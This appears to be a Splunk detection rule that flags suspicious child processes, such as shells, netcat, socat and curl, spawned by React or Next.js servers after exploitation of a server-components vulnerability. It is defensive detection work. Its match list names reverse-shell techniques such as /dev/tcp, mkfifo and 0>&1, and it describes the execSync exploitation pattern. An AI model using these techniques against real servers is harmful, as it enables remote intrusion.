rare false positives might show up from child processes such as sh. apply additional filters as needed.

Techniques

Sample rules

Linux Suspicious React or Next.js Child Process

source: splunk
technicques:
- T1190
- T1059.004

Description

This analytic detects Linux processes such as sh, bash, and common Linux LOLBINs being spawned by React or Next.js application servers. In the context of CVE-2025-55182 / React2Shell / CVE-2025-66478 for Next.js, successful exploitation can lead to arbitrary JavaScript execution on the server, which in turn is commonly used to invoke Node’s child_process APIs (for example child_process.execSync) to run OS-level commands. Public proof-of-concept payloads and observed in-the-wild exploit traffic show patterns where the vulnerable React Server Components handler triggers process.mainModule.require(‘child_process’).execSync() to execute binaries such as ping, curl, or arbitrary shells on the underlying host. This detection focuses on suspicious child processes where a Next/React server process spawns an uncommon process. Such activity might be a strong indicator of exploitation of the aforementioned vulnerability.

Detection logic


| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime
  from datamodel=Endpoint.Processes
  where
    Processes.parent_process_name = "node"
    Processes.parent_process IN (
      "*--experimental-https*",
      "*--experimental-next-config-strip-types*",
      "*/node_modules/next*",
      "*next dev*",
      "*next start*",
      "*node_modules/.bin*",
      "*react-scripts start*",
      "*start-server.js*"
    )
    AND (
      Processes.process_name IN (
        "awk",
        "gawk",
        "ifconfig",
        "lua",
        "nc",
        "ncat",
        "netcat",
        "openssl",
        "perl",
        "php",
        "python",
        "python2",
        "python3",
        "ruby",
        "socat",
        "telnet"
      )
      OR (
        Processes.process_name IN ("curl", "wget")
        Processes.process = "*
|*"
      )
      OR (
        Processes.process_name IN (
          "bash",
          "dash",
          "sh"
        )
        NOT Processes.process = "*-c*"
      )
      OR (
        Processes.process_name IN (
          "bash",
          "dash",
          "ksh",
          "sh",
          "zsh"
        )
        Processes.process IN (
          "*/dev/tcp/*",
          "*/dev/udp/*",
          "*0>&1*",
          "*curl*",
          "*exec *>&*",
          "*fsockopen*",
          "*ifconfig*",
          "*mkfifo*",
          "*nc *",
          "*ncat*",
          "*netcat*",
          "*proc_open*",
          "*s_client*",
          "*socat*",
          "*socket*",
          "*subprocess*",
          "*TCPSocket*",
          "*wget*"
        )
      )
    )

by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
   Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
   Processes.parent_process_name Processes.parent_process_path Processes.process
   Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id
   Processes.process_integrity_level Processes.process_name Processes.process_path
   Processes.user Processes.user_id Processes.vendor_product


| `drop_dm_object_name(Processes)`

| `security_content_ctime(firstTime)`

| `security_content_ctime(lastTime)`

| `linux_suspicious_react_or_next_js_child_process_filter`